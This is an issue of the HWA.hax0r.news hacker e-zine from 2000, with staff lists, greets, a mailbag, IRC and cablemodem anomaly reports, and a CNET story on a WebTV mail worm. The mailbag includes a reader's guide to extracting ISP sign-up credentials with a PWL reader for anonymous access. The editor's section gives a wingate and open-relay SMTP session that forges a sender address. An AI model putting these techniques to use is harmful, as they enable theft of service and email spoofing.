* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=
@HWA'99, 2000
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD
** USE NO HOOKS **
Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>
cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...
@HWA
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
New members/affiliates
Xistence ..... General news and Dutch/German translations
sP|a|Zm ..... Swedish news / translations
SugarKing ..... General news articles
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs*
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
theduece ytcracker loophole BlkOps
MostHated vetesgirl Slash bob-
CHEVY* Debris pr1zm JimJones
Dragos Ruiu pr0xy MR^CHAOS Eckis
Fuqrag Messiah v00d00 meliksah
dinkee omnihil sP|a|Zm OE
KillNow iPulse erikR prizm
paluka Xistence doobee phold hi ;)
{} mixter merXor abattis
Xistence
#darknet #feed-the-goats #EUA #IBT the b0f crew etc fuck I
/storm/ did you do it yet? ;-) i'll get your shit in here
soon.. promise :)
shouts to Xochitl13 for sending the cool postcard with a pic
of the la 2600 meeting place. cheers dude!
Folks from #hwa.hax0r,news and other leet secret channels,
*grin* - mad props! ... ;-)
And many others, sorry if i missed you or forgot you! mail
me and i'll flail myself unforgivingly in front of my open
bedroom window until I bleed, then maybe, add u to the list
(please, don't ask for pics...)
Also mad props to doobee and the CCC (Chaos Computer Club)
in Germany for setting up a new listserv system to help
distribute the zine. (Will be in action soon, I have admin
work to do first and testruns..).
:-)))
Ken Williams/tattooman ex-of PacketStorm,
SpaceRogue for running a kick ass news net
Emmanuel Goldstein for pure staying power
All the crackers, hackers and phreakers
The sysadmins, NOC controllers, network engineers
IRCops, security professionals, tiger team operatives
military cyberwar grunts, feds and 'special computer
unit' coppers trying to keep shit together in this
anarchic chaos.
AND
Kevin Mitnick (free at last, stay free this time man...)
Kevin was released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/
Recently reported 'helping' out the feds with security advice!
kewl sites:
+ http://hackdesk.dhs.org/ NEW -> NEWBIE help + MORE
+ http://www.hack.co.za **DOWN **
EfNet channel: #darknet
+ http://blacksun.box.sk.
+ http://packetstorm.securify.com/
+ http://www.securityportal.com/
+ http://www.securityfocus.com/
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://www.pure-security.net/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
Since we provide only the links in this section, be prepared
for 404's - Ed
+++ When was the last time you backed up your important data?
++ http://zcaofficedirectory.com/
Beware of "pay-per-call" Area Code 809 SCAM!
Do not respond to e-mails, phone calls, or pages which inform you
to call Caribbean Islands Area Code " 809 " phone number.
If you call from the United States, you will be apparently be charged
$25.00 per minute (without being warned beforehand).
It's important to prevent becoming a victim of this SCAM.
Check all area codes before returning a call.
Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*** NEW WEB BOARD! ***
========================================================================
The message board has been REVIVED with a new script and is doing quite
well. Check it out
http://discserver.snap.com/Indices/103991.html
.
Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed
=======================================================================
* An interesting usenet email with a cool telephony URL to check out: *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 25 Feb 2000 12:33:09 -0600
From: "Jennifer 'AstroJenn' Martino" <jennmartino@my-deja.com>
Subject: Re: HWA.hax0r.news Underground Security
Organization: Not today. Not yesterday. And probably not tomorrow.
To: Cruciphux <cruciphux@my-deja.com>
Reply To: jennmartino@my-deja.com
i have a few phone sounds that you might be interested in..
cycle tone sweeper, switch verification messages, unidentifiable
messages, those recordings that say a bunch of numbers, spit out touch
tones and hang up, test messages, etc.
less interesting than the above, but i also have recordings of some odd
error messages, loops, blue box tones, red box tones, touch tones,
ccitt5, a call from a jail.
when applicable, the filename is the actual phone number i called to
recieve the sound.
unfortunately they are not in ram nor mp3 formats but..
you can find my collection at
hope that helps,
jenn
--
The Web Page You Have Reached http://twpyhr.usuck.com
Over 225 telephone sounds. Home to "The Unofficial Touch Tone Tunes
FAQ" "The Phoney Dance. A collection of telephone graphics.
Jenn's Joint http://jennsays.usuck.com
My Ob-Personal Page.
-=-
Freebie net hack ... these things are everywhere now, if you can't get
net access for free or dirt cheap you're paranoid or living under a
rock :-) ... of course remember, you get what you pay for - Ed
From: M* H* <m*h*@????????.nl>
To: <cruciphux@dok.org>
Sent: Friday, March 24, 2000 9:58 AM
Subject: submission
I wrote this text just know, thought it might be usefull (dont use my
realname or something plz).
Grtz,
m-m
-------------------------------------------------------------------------------
************************************************************
* HOW TO GET FREE (READ: ANONYMOUS) INTERNET ACCESS *
* m-m <email: michiel@unbounded.com> *
************************************************************
YOU'LL NEED:
Windoze (I'm sorry!)
A PWL Reader (TIP: get the demo version of pwltool @ www.webdon.com)
One of them ISP CD's with the M$ Internet Connection Wizzard
HOW DOES IT WORK:
For the ones that don't know that the internet connection wizzard is, i'll
explain quickly. Since ISP's are constantly dying to get new members, they
(sometimes) give away free CD's with magazines and stuff. All ICW does is
make a temporary connnection to a server, get some HTML, run Internet
Explorer in fullscreen and have you fill in some stupid forms which will
be CGI'd to the administration so you'll get your internet accout... and
the bill. Filling in false info can be usefull, but won't work long + it's
illegal.
For the temporary connection to the server ICW just makes a new Dial-up
connection. So what you need to do is just boot up one of them
CD's, make that connection, alt+tab away and use the PWL Reader to get the
temporary info for the account.
Cancel your subscribing and throw away the CD. The connection gets deleted
from your dialup's automaticly to prevent such abuse.
Load up your normal internet connection and go to that ISP's website. Go
for technical support and get the nearest PoP. (Read: telephone
number to log in).
Now make a new dialup connection with that number and the login name and
password you just earned with the PWL reader. Voilla. You're
connected. (Note: these are usually guest/guest or stuff like that).
Try reaching a external website (i.a. www.news.insource.nl). If can't
connect it probably means the ISP was smart and blocked all external
traffic for the sign up account.
I've tried this on several ISP's and it worked most of the time. Some
ISP's were smart enough to block such jokes but some weren't. Since
free internet is a fact these days this is only usefull to remain
anonymous. (if you're hacking or something).
<SNIP>
end of email
-=-
From: Dragos Ruiu <dr@dursec.com>
To: <*>
Sent: Thursday, March 23, 2000 10:53 PM
Subject: kyxspam: hnn hacked?
After fielding TV reporter questions on the subject...
I tried to go see what HNN had to say about Max,
and www.hackernews.com got me a page that said:
<html>
<head>
<title>
White House
</title>
</head>
<body bgcolor=white>
White House WhiteHouse White House
<SCRIPT LANGUAGE = "JavaScript">
window.location = "http://www.whitehouse.com";
</SCRIPT>
WHite House<br>
<h1><a href="http://www.whitehouse.com">White House</a></h1>
</body>
</html>
... definitely not what I was looking for ....
--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com
-=-
Editor's note: this hack is unconfirmed and was not mentioned on HNN (curious) possibly
a dns grab, unknown at this time ... i'd have expected HNN to acknowledge any hacks
successful or not. Site whitehouse.com is a porn site... take that as you will.
-=-
From: Mr. Unknown <mr_unknown10@hotmail.com>
To: <cruciphux@dok.org>
Sent: Wednesday, March 22, 2000 7:18 PM
First I want to say the zine is kickass.
SugarKing pointed me to the lastest one. Read it last nite at work. That
really sux that Fuqrag was raided. I work at a place where he did a
defacement and maybe some other stuff. ;) Since then, I have been
interested about what else he was doing. Only could catch the latest
defacements, though. I get a good laugh at work when the servers go down<of
course NT> and say "FUQRAG IS BACK!" They freak! haa haa so funny it
really pisses them off. They won't listen to me about our networks security
since I am only a pc tech. and they are big MSCE's. I thought MSCE's had to
know their shit? They set up a ftp server and told everyone that it didn't
allow anonymous log in, ha, should've seen their faces when some good pics
should up in their personal directories. After they still hadn't figured out
who it was, I told them how to fix that problem. What do you know, the next
day my admin rights were gone,<can't even add machines to the domain> and
the test account another admin setup for me was gone. Even showed them
problems with asp. It's just pissing them off and they are not doing
anything about it. Not even patching old holes. Very discouraging for me,
when I can show them how to fix their shit. You would think after being
hacked they would do something. reading the interview with fuqrag was some
kewl shit. I hope they take it easy on em. I hope he writes some articles
for the zine, too. Anyway I just wanted to let you know that the zine kicks
ass and content is good. I wish to be as 313373 as fuqrag!!
Keep up the great work
mr.unknown
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
-=-
The kind of mail we love getting ... :-) - Ed
And some interesting SPAM ?!?
<headers toasted>
Dear Web Master,
Do you want to know how your computer skills rate?
Take a FREE Brainbench certification exam ONLINE and find
out how good your IT skills really are.
Everyday, thousands of technical professionals take a FREE
Brainbench certification exam online to rate their skills.
They use the test results to get a better understanding of
their strengths and weaknesses or to earn a certification
that helps them get a better job. It only takes a moment to
register online for an exam. You will then immediately
receive your FREE test access code, which will allow you to
take the multiple-choice exam anytime within the next 30
days. Register NOW at
http://destinationsite.com/c?c=71838.2597.0.3128.0
If you pass the exam, Brainbench will certify your skill and
mail you an attractive 81/2" x 11" certificate FREE! Plus
you can make your certification available online if you
choose. As the world's leading skills certification
authority, Brainbench certifications are recognized by major
employers and staffing organizations throughout the world.
============================================================
Register for any FREE exam NOW and
automatically enter a monthly drawing for $500.
http://destinationsite.com/c?c=71838.2597.0.3128.1
Take advantage of this great offer!
Pass it along to your friends!
Brainbench has 60 different exams to choose from!
============================================================
How does it work?
1) Register for an exam at
http://destinationsite.com/c?c=71838.2597.0.3128.2
There are about 60 exams to choose from. You will receive
instructions on how to complete the exam when you register.
2) When it is convenient for you, enter your test code at
the Brainbench website. You will take the multiple-choice
exam online. It will take about 45 minutes. You can take
it ANYTIME from ANYPLACE using a common web browser.
(version 3.0 or later preferred).
3) As soon as you finish the exam, you can view your test
results including your skill rating
(on a scale of 1.00 - 5.00) with a list of your strengths
and weaknesses.
To certify you need a score of 2.75 or higher.
To certify as a Master, you need a score of 4.00 or
higher.
The test engine is computer-adaptive, meaning it will
adjust to your skill level so whether you are a novice or
an expert, it will ask questions that are close to your
skill level.
4) All your information is held private unless you allow it
to be released.
Who recognizes Brainbench certifications?
1) Virtually all employers recognize Brainbench
certifications- we are the leading independent
certification authority with over 500,000 exams ordered
last year!
2) Top technology companies and top staffing companies use
Brainbench exams to screen their technical staffs,
including: Ernst & Young, EDS, CSC,
PriceWaterhouseCoopers, kforce.com, JP Morgan and many
others.
3) Due to Brainbench's secure adaptive-testing method,
employer's trust the Brainbench approach to validating
a job candidate's skills.
What does it mean to be certified?
1) It means you join the ranks of those professionals who
can prove that they have the credentials to do a job.
Employers will be more likely to put their trust in you.
2) You can pursue, with confidence, the jobs you want.
3) Whether you pass or not, every time you take the test
you will receive a private report on your strengths and
weaknesses as well your personal ranking in the industry.
Is it really FREE?
Yes. There is absolutely NO CHARGE to you. You can take the
exam FREE. We'll mail your certificate, FREE. There are no
hidden costs. We are doing this because we want to grow the
number of people who receive the benefit of a Brainbench
certification exam. We will eventually charge people to
take the exam, but for now it is FREE. So enjoy, and
please- pass this on to your friends.
Register now for your FREE exam: at
http://destinationsite.com/c?c=71838.2597.0.3128.3
Mike Littman
Cofounder, Brainbench, The skills authority
-=-
From: <S*P*@*.?????.*.com>
To: <cruciphux@dok.org>
Sent: Saturday, March 18, 2000 5:42 AM
Subject: Need a hand? ... I mean, Help?
Hello, there...
I came across your HWA newsletter. I read you are looking for help.
I have no clue about hacking and all the magic that you guys do. I can tell
you it fascinate me, and I've been reading attrition for quite a while. I
work with computers
(as in: Dummy 101 . Can't expect much from blondes...*ugh*)
I'm originally from Italy. So, If you ever came across something to
translate from Italian to English I would be more than happy to help you out.
I'd like to keep a very-very low profile. No profile at all would even be
better.
Just my 2 Cents.
You're doing a wonderful job...
Ciao, ciao
Simona
-=-
Don't usually post these, but just to prove we do get offers of help
so don't sit there get up and do something too! :-)) - Ed
-=-
Using cablemodem? especially on the @HOME network? expect weird shit
the teething problems aren't over .. heres an interesting diatribe
from Dragos on some recent @home-isms ... - Ed
:
From: Dragos Ruiu <dr@dursec.com>
To: <*>
Sent: Monday, March 20, 2000 11:58 PM
Subject: kyxquestions: @home puke
Here are more puzzles for all you armchair hacker sleuths...
In the last two days my cablemodem has started spewing ICMP Host Unreachable
packets from a local 10.11.* address to seemingly random addresses but each
address is repeated multiple times. Most of the dest hosts are in 207.230.246.*
We are talking about lots of packets here... every couple of min.
This was preceeded by the unusual occurrence of 10.11.* -> 10.11.* traffic.
Which was followed by mapping and poking at random 10.11.* addresses
from varied addresses. 10.11 is where @ home puts their cablemodems.
As to why I would be seeing this stuff on the client side of my cablemodem
that's a good question - expecially those 10.11 -> 10.11 packets. I haven't
ruled out some flaky modem or router yet blasting garbage into the ether, and
@home has been having to "reboot their servers" a lot lately.
Other wierd stuff is broadcasts from 10.11.* hosts on port 121 to subnet
broadcast addresses.
Looking back into the logs shows that this kind ICMP storm has happened in the
past weeks on and off a couple of times. Interestingly, before today... the
destination was always in the 172.16.*.* address space. Each time, the activity
starts, is heavily active and then stops within minutes.... only today it seems
to be going on and not abating and it seems to like destinations of
207.230.246.[170,253] (what looks like a name server {woop, woop, danger will
robinson} and a test box at vsb.bc.ca and 24.112.31.56 and 172.16.6.195 (no
reverse dns lookup avail) as it's favorite destinations. Todays activity seems
to all come from one cablemodem and the activity in the past seemed to vary in
source modem address. The single source says to me that it may just
be one flaky modem.
Now I gotta go and find where the whois registry for the ca domain hides.
Miscelaneous crud:
24.113.85.105 cr547339-a.surrey1.bc.wave.home.com which seems to be running
some sort of port-1080-wingate sort of thing has been trying to log in to an ftp
server here, when he oughtn't.
And lots and lots of the typical wingate scans and along with oodles of the not
so common yet Trin00/TrojanCow/DeepThroat 3.1 traffic/scans. Anybody got
a good rundown/synopsis of DeepThroat or Trojan Cow they can point me to?
I have to go see what ArachNIDS says. BTW for those that are keeping score
Trojan Cow seems to be the winner in the number of hosts infected dept.
if the # of different sources of the broadcasts and volume are any indication.
Bottom line:
Something is wierd and new. We also had a runaway lynx process on one
server.... now I hear there is a new remote overflow in it (Safer) - but that is
just circumstancial evidence. That plus another potentially false outbound xterm
trigger all leads to the old spidey senses saying... fee fi fo fum... I smell
hacking.
P.p.s. for Max and the rules guys... outbound nmap TCP connect scans seem to
false the "AOL chat data" rules in snort, not sure if that's in vision.conf or
rapidnet set yet but I find this a useful falsing that lets me log outbound
nmaps I initiate. :-)
--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - April 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com
-=-
* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~
(Didn't pull any from the board, check it out, some interesting
stuff on there... - Ed)
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/* Another monthly release... oh well read on.
*
*
* Cruci
*
* cruciphux@dok.org
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Anonymous email:
telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied
or
550 admin@nasa.gov... Domain must exist
etc.
* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)
-=-
Congrats, thanks, articles, news submissions and kudos to us at the
main address: cruciphux@dok.org complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Clearing up a nasty screw up in issue #51, here's what happened...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I fucked up. Two 'versions' of #51 were actually released, a few early birds
got the "bad" copy. The 'real' copy has (2) in the upper left very top corner.
Collectors edition!
:-)
Details? nah you wouldn't be interested anyways....
-=-
@HWA
04.0 HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NOTE:
I had a gracious offer from *someone* the last time HACK.CO.ZA needed
hosting but unfortunately my mailbox had corrupted and I lost this
message before I could forward it to the site owner Gov-Boi, if after
reading this you can still offer services, please send another email
to me at cruciphux@dok.org... thanks!
@HWA
05.0 WebTV hit by "Melissa-Type" virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by: Merxenary
Source: C|Net
http://news.cnet.com/news/0-1006-200-1576095.html?tag=st.ne.1002.
WebTV hit by Melissa-like bug
By Stephanie Miles
Staff Writer, CNET News.com
March 17, 2000, 3:55 p.m. PT
WebTV has been hit by a self-replicating bug that is wreaking havoc
with the network's message boards and newsgroups, a situation that
knocks back the company's claim that it is immune to viruses and
security holes.
The problem, which some are calling the "Flood Virus," gets inside
the e-mail system of WebTV owners and prompts the WebTV settop box
to litter bulletin board and newsgroup sites on the company's
network with redundant junk mail. Like the Melissa virus, the
malicious WebTV code sends out the emails under a user's name
without their knowledge.
Melissa-type viruses cause damage by clogging email servers of
corporations and organizations with illegitimate emails. For
WebTV users, the chief problem so far has come in trying to read
the intra-network web sites. Bulletin boards on the WebTV network
only show five postings at a time. An outbreak of the Flood Virus
therefore makes it very difficult for users to find relevant
messages on the board.
Subscribers also face potential embarrassment, as emails under
their name are posted to newsgroups without their knowledge.
Microsoft, which owns WebTV, has confirmed the existence of the
problem but claims the situation is a hack rather than a virus.
The company added that the problem is not widespread.
Whatever the root cause of the problem, the situation is black eye
for the service. One of WebTV's marketing pitches has been that
subscribers do not have to worry about rogue viruses on the Internet.
Microsoft also has had a tempestuous relationship with segments of
its subscriber base over technological issues in the past. After
gaining attention as the first firm to offer Internet service through
the television, WebTV has struggled to build its subscriber base and
has encountered criticism from users for failing to support standard
Web technologies such as Java. The company was acquired by Microsoft
in 1997.
WebTV was recently forced to reverse course and remove banner ads
from emails viewed and stored on the site in response to a flood of
customer complaints. The backlash comes as WebTV faces a looming
challenge from Internet service giant America Online, which is set
to launch its AOL TV sometime this summer.
The problem was first discovered by Net4TV, which tracks interactive
television. Net4TV came up with the Flood Virus name.
"It's absolutely self-replicating. It inserts the virus code into the
signature upon opening the email or going to the newsgroup," said
Brian Bock, editor in chief at Net4TV.
The general public does not have to worry about the flaw. It can only
come in e-mails from WebTV units and it only effects other WebTV boxes.
In addition, all of the excess mail is currently being directed at
newsgroups and bulletin boards on the company's network.
The WebTV network is written mainly in HTML, and the company uses HTML
shortcuts for certain network features, according to Net4TV. Shortcuts
within user's email signature files, the calling card at the bottom of
an e-mail message, serve as the entryway for the malicious code. The
code manipulates the signature file and then prompts the Web TV unit
to post repeatedly to WebTV newsgroups.
WebTV representatives could not confirm this account of how the network
is set up. Nonetheless, they acknowledged it exists.
"It's a fundamental flaw in the WebTV architecture," Bock said.
Although WebTV currently counts about one million subscribers, Microsoft
is marketing portions of the service along with its TV Pak to cable
service providers as Microsoft TV. If portions of the WebTV browser are
easily susceptible to these types of attacks, Bock said, it does not bode
well for Microsoft TV if it is installed on a widespread basis through
cable providers.
"It points to a larger problem," he said, calling for an independent
security analysis of the WebTV architecture, similar to that which took
place with Microsoft's Hotmail free email service after suffering repeated
privacy breaches. "It points to what else may be going on under there."
For its part, WebTV says the problem has only hit a very small number of
WebTV Classic users. According to Microsoft, hackers combined two known
WebTV hacks: one which inserts malicious code into the user's email
signature file, and one which inserts malicious code into postings on
the newsgroup itself.
"These two codes were linked together," a spokesperson said, asserting
that only 14 of the 594,000 WebTV Classic users have reported being
